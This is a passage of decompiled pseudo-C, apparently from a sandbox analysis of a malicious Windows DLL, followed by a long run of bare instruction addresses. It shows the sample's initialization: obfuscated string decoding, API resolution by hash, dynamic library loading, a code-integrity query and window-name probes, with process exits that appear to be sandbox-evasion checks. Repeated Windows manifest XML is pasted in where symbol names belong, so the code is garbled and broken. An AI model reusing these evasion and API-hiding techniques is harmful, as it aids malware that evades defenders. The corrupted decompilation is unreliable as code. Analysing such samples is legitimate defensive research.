                                                                                                                        									"\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 1;
                                                                                                                        									M6F3404AC = E6F333390();
                                                                                                                        									_t375 = E6F331D50(0x77d938, _t601);
                                                                                                                        									M6F340580 = _t375;
                                                                                                                        									M6F340518 = _t375;
                                                                                                                        									M6F34054C = E6F331D50(0x7b16d4, _t601);
                                                                                                                        									M6F340570 = E6F331D50(0x7b7db0, _t601);
                                                                                                                        									M6F340550 = E6F331D50(0x7725be, _t601);
                                                                                                                        									M6F340554 = E6F331D50(0x7725bc, _t601);
                                                                                                                        									M6F340574 = E6F331D50(0x7b701c, _t601);
                                                                                                                        									M6F340578 = E6F331D50(0x7a2d08, _t601);
                                                                                                                        									M6F34057C = E6F331D50(0x7b70d8, _t601);
                                                                                                                        									M6F340558 = E6F331D50(0x7a304c, _t601);
                                                                                                                        									M6F34055C = E6F331D50(0x749a58, _t601);
                                                                                                                        									M6F340560 = E6F331D50(0x74b970, _t601);
                                                                                                                        									/* unresolved global (decompiler printed embedded manifest XML in place of the symbol) */ = E6F331D50(0x7b0408, _t601);
                                                                                                                        									M6F340568 = E6F331D50(0x77ec48, _t601);
                                                                                                                        									M6F34056C = E6F331D50(0x74cddc, _t601);
                                                                                                                        									_t390 = E6F33A2F0(E6F331D50(0x7b4550, _t601), 0, 0);
                                                                                                                        									M6F3404DC = _t390;
                                                                                                                        									M6F3404E0 = lstrlenA(_t390);
                                                                                                                        									M6F340584 = E6F331D50(0x77a5b8, _t601);
                                                                                                                        									M6F3404D8 = E6F33A2F0(E6F331D50(0x7ad0d4, _t601), 0, 0);
                                                                                                                        									M6F3404D4 = E6F33A2F0(E6F331D50(0x7adf00, _t601), 0, 0);
                                                                                                                        									M6F340588 = E6F331D50(0x772a50, _t601);
                                                                                                                        									 *0x6f34047c = E6F33A2F0(E6F331D50(0x772af0, _t601), 0, 0);
                                                                                                                        									_t400 = GetCommandLineA();
                                                                                                                        									_t508 =  &_v868;
                                                                                                                        									_v868 = 0;
                                                                                                                        									_t605 = E6F33A3D0(_t400,  &_v868);
                                                                                                                        									_t618 = _t613 + 0xdc;
                                                                                                                        									if(_t605 != 0) {
                                                                                                                        										CharLowerA( *_t605);
                                                                                                                        										_t575 = _v868;
                                                                                                                        										if(_t575 > 1) {
                                                                                                                        											_t596 = 1;
                                                                                                                        											do {
                                                                                                                        												if(_t596 >= _t575 - 1) {
                                                                                                                        													L34:
                                                                                                                        													_t476 =  *((intOrPtr*)(_t605 + _t596 * 4));
                                                                                                                        													_t508 =  *_t476;
                                                                                                                        													__eflags = _t508 - 0x6b;
                                                                                                                        													if(_t508 != 0x6b) {
                                                                                                                        														L37:
                                                                                                                        														__eflags = _t508 - 0x66;
                                                                                                                        														if(_t508 == 0x66) {
                                                                                                                        															__eflags =  *(_t476 + 1);
                                                                                                                        															if( *(_t476 + 1) == 0) {
                                                                                                                        																M6F3404B8 = 1;
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        													} else {
                                                                                                                        														__eflags =  *(_t476 + 1);
                                                                                                                        														if( *(_t476 + 1) != 0) {
                                                                                                                        															goto L37;
                                                                                                                        														} else {
                                                                                                                        															M6F3404B4 = 1;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												} else {
                                                                                                                        													_t477 =  *((intOrPtr*)(_t605 + _t596 * 4));
                                                                                                                        													if( *_t477 != 0x77 ||  *((intOrPtr*)(_t477 + 1)) != 0) {
                                                                                                                        														goto L34;
                                                                                                                        													} else {
                                                                                                                        														_t508 =  *(_t605 + 4 + _t596 * 4);
                                                                                                                        														_t596 = _t596 + 1;
                                                                                                                        														_t478 = StrToIntA(_t508);
                                                                                                                        														_t575 = _v868;
                                                                                                                        														M6F340514 = _t478;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												_t596 = _t596 + 1;
                                                                                                                        											} while (_t596 < _t575);
                                                                                                                        										}
                                                                                                                        										LocalFree(_t605);
                                                                                                                        									}
                                                                                                                        									_push(8);
                                                                                                                        									_push(0x6f340398);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_t548 = /* unresolved global (decompiler printed embedded manifest XML in place of the symbol) */; // 0x9953a0
                                                                                                                        									E6F332140(_t508, _t548, 1);
                                                                                                                        									_t403 = M6F3404F0; // 0x998d58
                                                                                                                        									_t509 = M6F340500; // 0x977288
                                                                                                                        									_t549 = M6F3404F4; // 0x99b258
                                                                                                                        									_t404 = E6F333180(_t549, _t509, _t403);
                                                                                                                        									_t511 = M6F3404F0; // 0x998d58
                                                                                                                        									_v972 = 0x6467;
                                                                                                                        									_v970 = 0;
                                                                                                                        									M6F3404E4 = _t404 % 0x7fffffff;
                                                                                                                        									_t552 = M6F3404CC; // 0x99d818
                                                                                                                        									_t407 = GetPrivateProfileIntA(_t511,  &_v972, 0, _t552);
                                                                                                                        									_t553 = M6F340524; // 0x9954b0
                                                                                                                        									M6F3404BC = _t407; // executed
                                                                                                                        									_t408 = GetModuleHandleA(_t553); // executed
                                                                                                                        									/* unresolved global (decompiler printed embedded manifest XML in place of the symbol) */ = _t408;
                                                                                                                        									_t410 = GetModuleHandleA(E6F331D50(0x77146c, _t601));
                                                                                                                        									_push(0x435a88);
                                                                                                                        									_t606 = _t410;
                                                                                                                        									_push(1);
                                                                                                                        									_push( &_v968);
                                                                                                                        									_push(_t606);
                                                                                                                        									_v968 = 0x3f82e705;
                                                                                                                        									_v964 = 0;
                                                                                                                        									_v960 = 0;
                                                                                                                        									_v956 = 0;
                                                                                                                        									E6F331DB0();
                                                                                                                        									_t413 = _v956;
                                                                                                                        									_t621 = _t618 + 0x2c;
                                                                                                                        									if(_t413 != 0) {
                                                                                                                        										M6F34058C = _t413;
                                                                                                                        									}
                                                                                                                        									_t415 = E6F33A2F0(E6F331D50(0x77d760, _t601), 0, 0);
                                                                                                                        									_t512 = /* unresolved global (decompiler printed embedded manifest XML in place of the symbol) */; // 0x996628
                                                                                                                        									_t589 = _t415;
                                                                                                                        									wsprintfA( &_v576, "%s%s", _t512, _t589);
                                                                                                                        									_t622 = _t621 + 0x24;
                                                                                                                        									HeapFree(GetProcessHeap(), 0, _t589);
                                                                                                                        									_t420 = LoadLibraryA( &_v568); // executed
                                                                                                                        									M6F3404A8 = _t420;
                                                                                                                        									if(E6F33B4C0() != 0) {
                                                                                                                        										ExitProcess(0);
                                                                                                                        									}
                                                                                                                        									_push(8);
                                                                                                                        									_push( &_v852);
                                                                                                                        									M6F340614 = 1;
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_v860 = 8;
                                                                                                                        									_v872 = 0;
                                                                                                                        									_t423 = NtQuerySystemInformation(0x67,  &_v860, 8,  &_v872); // executed
                                                                                                                        									if(_t423 < 0 || _v888 != 8 || (_v872 & 0x00000002) == 0) {
                                                                                                                        										_t591 = 0;
                                                                                                                        									} else {
                                                                                                                        										_t591 = 1;
                                                                                                                        										_v992 = 1;
                                                                                                                        									}
                                                                                                                        									if(_t606 != 0) {
                                                                                                                        										_push(0x435a88);
                                                                                                                        										_push(1);
                                                                                                                        										_push( &_v984);
                                                                                                                        										_push(_t606);
                                                                                                                        										_v984 = 0x2e136e83;
                                                                                                                        										_v980 = 0;
                                                                                                                        										_v976 = 0;
                                                                                                                        										_v972 = 0;
                                                                                                                        										E6F331DB0();
                                                                                                                        										_t470 = _v972;
                                                                                                                        										_t632 = _t622 + 0x10;
                                                                                                                        										if(_t470 != 0) {
                                                                                                                        											/* unresolved global (decompiler printed embedded manifest XML in place of the symbol) */ = _t470;
                                                                                                                        										}
                                                                                                                        										_t96 = _t591 + 0x435a88; // 0x435a88
                                                                                                                        										_v984 = 0xa1acb3a1;
                                                                                                                        										_v980 = E6F337C40;
                                                                                                                        										_v976 =  &M6F3405A4;
                                                                                                                        										_v972 = 0;
                                                                                                                        										_v968 = 0xd9ef7edb;
                                                                                                                        										_v964 = E6F3378B0;
                                                                                                                        										_v960 =  &M6F340594;
                                                                                                                        										_v956 = 0;
                                                                                                                        										_v952 = 0x75da5974;
                                                                                                                        										_v948 = E6F337C20;
                                                                                                                        										_v944 =  &M6F3405A0;
                                                                                                                        										_v940 = 0;
                                                                                                                        										_v936 = 0x2a081f08;
                                                                                                                        										_v932 = E6F338230;
                                                                                                                        										_v928 =  &M6F3405F8;
                                                                                                                        										_v924 = 0;
                                                                                                                        										_v920 = 0x71e40fdf;
                                                                                                                        										_v916 = E6F3382C0;
                                                                                                                        										_v912 =  &M6F3405FC;
                                                                                                                        										_v908 = 0;
                                                                                                                        										E6F331FA0(_t606,  &_v984, 5, _t96);
                                                                                                                        										_t622 = _t632 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t424 = E6F331D50(0x771704, _t601);
                                                                                                                        									_t514 = /* unresolved global (decompiler printed embedded manifest XML in place of the symbol) */; // 0x996628
                                                                                                                        									wsprintfA( &_v592, "%s%s", _t514, _t424);
                                                                                                                        									_t623 = _t622 + 0x18;
                                                                                                                        									_t427 = LoadLibraryA( &_v584);
                                                                                                                        									M6F340490 = _t427;
                                                                                                                        									if(_t427 != 0) {
                                                                                                                        										_v856 = 0x1ee4afd;
                                                                                                                        										_v852 = E6F337F10;
                                                                                                                        										_v848 =  &M6F3405E8;
                                                                                                                        										_v844 = 0;
                                                                                                                        										_v840 = 0xcd967670;
                                                                                                                        										_v836 = E6F3380B0;
                                                                                                                        										_v832 =  &M6F3405EC;
                                                                                                                        										_v828 = 0;
                                                                                                                        										_v824 = 0xc640750c;
                                                                                                                        										_v820 = E6F338100;
                                                                                                                        										_v816 =  &M6F3405F0;
                                                                                                                        										_v812 = 0;
                                                                                                                        										_v808 = 0x856c5686;
                                                                                                                        										_v804 = E6F337E20;
                                                                                                                        										_v800 =  &M6F3405C0;
                                                                                                                        										_v796 = 0;
                                                                                                                        										_v792 = 0xd576e7bf;
                                                                                                                        										_v788 = E6F337E50;
                                                                                                                        										_v784 =  &M6F3405C4;
                                                                                                                        										_v780 = 0;
                                                                                                                        										_v776 = 0x4bdf2df3;
                                                                                                                        										_v772 = E6F337EC0;
                                                                                                                        										_v768 =  &M6F3405B8;
                                                                                                                        										_v764 = 0;
                                                                                                                        										_v760 = 0x25955ea4;
                                                                                                                        										_v756 = E6F337EE0;
                                                                                                                        										_v752 =  &M6F3405E0;
                                                                                                                        										_v748 = 0;
                                                                                                                        										_v744 = 0x576e0706;
                                                                                                                        										_v740 = E6F337E00;
                                                                                                                        										_v736 =  &M6F3405B0;
                                                                                                                        										_v732 = 0;
                                                                                                                        										_v728 = 0xa3bab257;
                                                                                                                        										_v724 = E6F337E00;
                                                                                                                        										_v720 =  &M6F3405B4;
                                                                                                                        										_v716 = 0;
                                                                                                                        										_v712 = 0xeb950520;
                                                                                                                        										_v708 = E6F337EF0;
                                                                                                                        										_v704 =  &M6F3405E4;
                                                                                                                        										_v700 = 0;
                                                                                                                        										_v696 = 0x983d21d0;
                                                                                                                        										_v692 = E6F337E90;
                                                                                                                        										_v688 =  &M6F3405C8;
                                                                                                                        										_v684 = 0;
                                                                                                                        										_v680 = 0xbd4f6953;
                                                                                                                        										_v676 = E6F337EA0;
                                                                                                                        										_v672 =  &M6F3405CC;
                                                                                                                        										_v668 = 0;
                                                                                                                        										_v664 = 0xc1059600;
                                                                                                                        										_v660 = E6F337EF0;
                                                                                                                        										_v656 =  &M6F3405BC;
                                                                                                                        										_v652 = 0;
                                                                                                                        										_v648 = 0x92d6cfa1;
                                                                                                                        										_v644 = E6F337EB0;
                                                                                                                        										_v640 =  &M6F3405D0;
                                                                                                                        										_v636 = 0;
                                                                                                                        										_v632 = 0xa710b547;
                                                                                                                        										_v628 = E6F337EF0;
                                                                                                                        										_v624 =  &M6F3405D4;
                                                                                                                        										_v620 = 0;
                                                                                                                        										_v616 = 0x35fe64ad;
                                                                                                                        										_v612 = E6F337DB0;
                                                                                                                        										_v608 =  &M6F3405A8;
                                                                                                                        										_v604 = 0;
                                                                                                                        										_v600 = 0x508fafbc;
                                                                                                                        										_v596 = E6F337DE0;
                                                                                                                        										_v592 =  &M6F3405AC;
                                                                                                                        										_v588 = 0;
                                                                                                                        										E6F331FA0(_t427,  &_v856, 0x11, _t591 + 0x435a88);
                                                                                                                        										_t568 = M6F340578; // 0x798f80
                                                                                                                        										_t189 = _t568 + 9; // 0x6854706f
                                                                                                                        										_v976 =  *_t189;
                                                                                                                        										_t463 = M6F340568; // 0x74cec0
                                                                                                                        										_t191 = _t463 + 0x1e; // 0x65006c
                                                                                                                        										_t623 = _t623 + 0x10;
                                                                                                                        										_v974 =  *_t191 & 0x0000ffff;
                                                                                                                        										_t193 = _t463 + 0x1e; // 0x65006c
                                                                                                                        										_t464 = M6F340574; // 0x784294
                                                                                                                        										_v972 =  *_t193 & 0x0000ffff;
                                                                                                                        										_t195 = _t464 + 1; // 0x61476e79
                                                                                                                        										_v970 =  *_t195;
                                                                                                                        										_v966 = 0x62;
                                                                                                                        										_v968 =  *_t464;
                                                                                                                        										_t199 = _t464 + 3; // 0x65746147
                                                                                                                        										_v964 =  *_t199;
                                                                                                                        										_v962 = 0;
                                                                                                                        										_t466 = FindWindowW( &_v976, 0); // executed
                                                                                                                        										_v964 = 0;
                                                                                                                        										_t468 = FindWindowW( &_v976, 0); // executed
                                                                                                                        										_t591 = _t466 + _t468;
                                                                                                                        										_v984 = _t591;
                                                                                                                        									}
                                                                                                                        									_t428 = E6F331D50(0x770adc, _t601);
                                                                                                                        									_t515 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        									wsprintfA( &_v584, "%s%s", _t515, _t428);
                                                                                                                        									_t624 = _t623 + 0x18;
                                                                                                                        									_t431 = LoadLibraryA( &_v576);
                                                                                                                        									M6F340494 = _t431;
                                                                                                                        									if(_t431 != 0) {
                                                                                                                        										_t208 = _t591 + 0x435a88; // 0x435a88
                                                                                                                        										_v968 = 0x1febfb51;
                                                                                                                        										_v964 = E6F337ED0;
                                                                                                                        										_v960 =  &M6F3405DC;
                                                                                                                        										_v956 = 0;
                                                                                                                        										_v952 = 0xa4bc5079;
                                                                                                                        										_v948 = E6F337EC0;
                                                                                                                        										_v944 =  &M6F3405D8;
                                                                                                                        										_v940 = 0;
                                                                                                                        										_v936 = 0x3fca0603;
                                                                                                                        										_v932 = E6F3383A0;
                                                                                                                        										_v928 =  &M6F340608;
                                                                                                                        										_v924 = 0;
                                                                                                                        										_v920 = 0x5fa6686b;
                                                                                                                        										_v916 = E6F3383D0;
                                                                                                                        										_v912 =  &M6F34060C;
                                                                                                                        										_v908 = 0;
                                                                                                                        										E6F331FA0(_t431,  &_v968, 4, _t208);
                                                                                                                        										_t624 = _t624 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t432 = E6F331D50(0x7715e4, _t601);
                                                                                                                        									_t433 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        									wsprintfA( &_v576, "%s%s", _t433, _t432);
                                                                                                                        									_t625 = _t624 + 0x18;
                                                                                                                        									_t435 = LoadLibraryA( &_v568);
                                                                                                                        									M6F340498 = _t435;
                                                                                                                        									if(_t435 != 0) {
                                                                                                                        										_t228 = _t591 + 0x435a88; // 0x435a88
                                                                                                                        										_v960 = 0xa0428c41;
                                                                                                                        										_v956 = E6F337B70;
                                                                                                                        										_v952 =  &M6F340598;
                                                                                                                        										_v948 = 0;
                                                                                                                        										_v944 = 0x35ad950a;
                                                                                                                        										_v940 = E6F337BD0;
                                                                                                                        										_v936 =  &M6F34059C;
                                                                                                                        										_v932 = 0;
                                                                                                                        										E6F331FA0(_t435,  &_v960, 2, _t228);
                                                                                                                        										_t625 = _t625 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t436 = E6F331D50(0x350b4, _t601);
                                                                                                                        									_t437 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        									wsprintfA( &_v568, "%s%s", _t437, _t436);
                                                                                                                        									_t626 = _t625 + 0x18;
                                                                                                                        									_t439 = LoadLibraryA( &_v560);
                                                                                                                        									M6F34049C = _t439;
                                                                                                                        									if(_t439 != 0) {
                                                                                                                        										_v952 = 0x32e7e368;
                                                                                                                        										_v948 = E6F3382F0;
                                                                                                                        										_v944 =  &M6F340600;
                                                                                                                        										_v940 = 0;
                                                                                                                        										E6F331FA0(_t439,  &_v952, 1, _t591 + 0x435a88);
                                                                                                                        										_t626 = _t626 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t441 = E6F33A2F0(E6F331D50(0x77cf0c, _t601), 0, 0);
                                                                                                                        									_t560 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        									_t592 = _t441;
                                                                                                                        									wsprintfA( &_v560, "%s%s", _t560, _t592);
                                                                                                                        									_t627 = _t626 + 0x24;
                                                                                                                        									HeapFree(GetProcessHeap(), 0, _t592);
                                                                                                                        									_t446 = LoadLibraryA( &_v552); // executed
                                                                                                                        									M6F3404A0 = _t446;
                                                                                                                        									if(_t446 != 0) {
                                                                                                                        										_v944 = 0xa4a1b443;
                                                                                                                        										_v940 = E6F337EE0;
                                                                                                                        										_v936 =  &M6F3405F4;
                                                                                                                        										_v932 = 0;
                                                                                                                        										E6F331FA0(_t446,  &_v944, 1, _v952 + 0x435a88);
                                                                                                                        										_t627 = _t627 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t447 = E6F331D50(0x37b4c, _t601);
                                                                                                                        									_t561 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        									wsprintfA( &_v552, "%s%s", _t561, _t447);
                                                                                                                        									_t628 = _t627 + 0x18;
                                                                                                                        									_t450 = LoadLibraryA( &_v544);
                                                                                                                        									M6F3404A4 = _t450;
                                                                                                                        									if(_t450 != 0) {
                                                                                                                        										_v936 = 0x468fa9db;
                                                                                                                        										_v932 = E6F338370;
                                                                                                                        										_v928 =  &M6F340604;
                                                                                                                        										_v924 = 0;
                                                                                                                        										E6F331FA0(_t450,  &_v936, 1, _v944 + 0x435a88);
                                                                                                                        										_t628 = _t628 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t451 = E6F3331F0(0xffffffff);
                                                                                                                        									_push(0xa);
                                                                                                                        									_push(0x10);
                                                                                                                        									_push(L"15.0.");
                                                                                                                        									M6F3404EC = _t451;
                                                                                                                        									_push(E6F331D50(0x1f3ac, _t601));
                                                                                                                        									E6F338400();
                                                                                                                        									if(E6F33B820(0) != 0) {
                                                                                                                        										ExitProcess(0);
                                                                                                                        									}
                                                                                                                        									M6F340614 = 2;
                                                                                                                        									return 1;
                                                                                                                        								} else {
                                                                                                                        									goto L131;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
                                                                                                                        0x00000000
                                                                                                                        0x6f338796
                                                                                                                        0x6f338797
                                                                                                                        0x6f338797
                                                                                                                        0x6f338794
                                                                                                                        0x6f338731
                                                                                                                        0x6f3386ea
                                                                                                                        0x6f33879d
                                                                                                                        0x6f3387a7
                                                                                                                        0x6f3387b0
                                                                                                                        0x6f3387b5
                                                                                                                        0x6f3387bb
                                                                                                                        0x6f3387c2
                                                                                                                        0x6f3387ce
                                                                                                                        0x6f3387d3
                                                                                                                        0x6f3387da
                                                                                                                        0x6f3387ec
                                                                                                                        0x6f3387f1
                                                                                                                        0x6f3387fb
                                                                                                                        0x6f338805
                                                                                                                        0x6f338811
                                                                                                                        0x6f338816
                                                                                                                        0x6f33881b
                                                                                                                        0x6f33881e
                                                                                                                        0x6f338823
                                                                                                                        0x6f338829
                                                                                                                        0x6f33882e
                                                                                                                        0x6f33883b
                                                                                                                        0x00000000
                                                                                                                        0x6f338841
                                                                                                                        0x6f338841
                                                                                                                        0x6f338844
                                                                                                                        0x6f33884c
                                                                                                                        0x00000000
                                                                                                                        0x6f338852
                                                                                                                        0x6f33885f
                                                                                                                        0x6f338866
                                                                                                                        0x6f33886a
                                                                                                                        0x6f338878
                                                                                                                        0x6f33887a
                                                                                                                        0x6f338881
                                                                                                                        0x6f33888c
                                                                                                                        0x6f338894
                                                                                                                        0x6f338896
                                                                                                                        0x6f33889d
                                                                                                                        0x6f33889d
                                                                                                                        0x6f338894
                                                                                                                        0x6f3388a7
                                                                                                                        0x6f3388b5
                                                                                                                        0x6f3388b7
                                                                                                                        0x6f3388be
                                                                                                                        0x6f3388cb
                                                                                                                        0x6f3388d3
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388dc
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388e4
                                                                                                                        0x6f3388ec
                                                                                                                        0x6f3388f6
                                                                                                                        0x6f3388fb
                                                                                                                        0x6f338900
                                                                                                                        0x6f338900
                                                                                                                        0x6f338905
                                                                                                                        0x6f33890a
                                                                                                                        0x6f33890f
                                                                                                                        0x6f338912
                                                                                                                        0x6f338912
                                                                                                                        0x6f338921
                                                                                                                        0x6f338923
                                                                                                                        0x6f33892a
                                                                                                                        0x6f33892c
                                                                                                                        0x6f338943
                                                                                                                        0x6f338949
                                                                                                                        0x6f338952
                                                                                                                        0x6f338957
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33896a
                                                                                                                        0x6f33897a
                                                                                                                        0x6f33897f
                                                                                                                        0x6f338994
                                                                                                                        0x6f338999
                                                                                                                        0x6f3389a4
                                                                                                                        0x6f3389a9
                                                                                                                        0x6f3389b9
                                                                                                                        0x6f3389c9
                                                                                                                        0x6f3389d9
                                                                                                                        0x6f3389e9
                                                                                                                        0x6f3389f9
                                                                                                                        0x6f338a09
                                                                                                                        0x6f338a1c
                                                                                                                        0x6f338a2c
                                                                                                                        0x6f338a3c
                                                                                                                        0x6f338a4c
                                                                                                                        0x6f338a5c
                                                                                                                        0x6f338a6c
                                                                                                                        0x6f338a7c
                                                                                                                        0x6f338a89
                                                                                                                        0x6f338a92
                                                                                                                        0x6f338aa3
                                                                                                                        0x6f338ab3
                                                                                                                        0x6f338acb
                                                                                                                        0x6f338ae3
                                                                                                                        0x6f338af3
                                                                                                                        0x6f338b0b
                                                                                                                        0x6f338b10
                                                                                                                        0x6f338b16
                                                                                                                        0x6f338b1c
                                                                                                                        0x6f338b28
                                                                                                                        0x6f338b2a
                                                                                                                        0x6f338b2f
                                                                                                                        0x6f338b39
                                                                                                                        0x6f338b3f
                                                                                                                        0x6f338b46
                                                                                                                        0x6f338b48
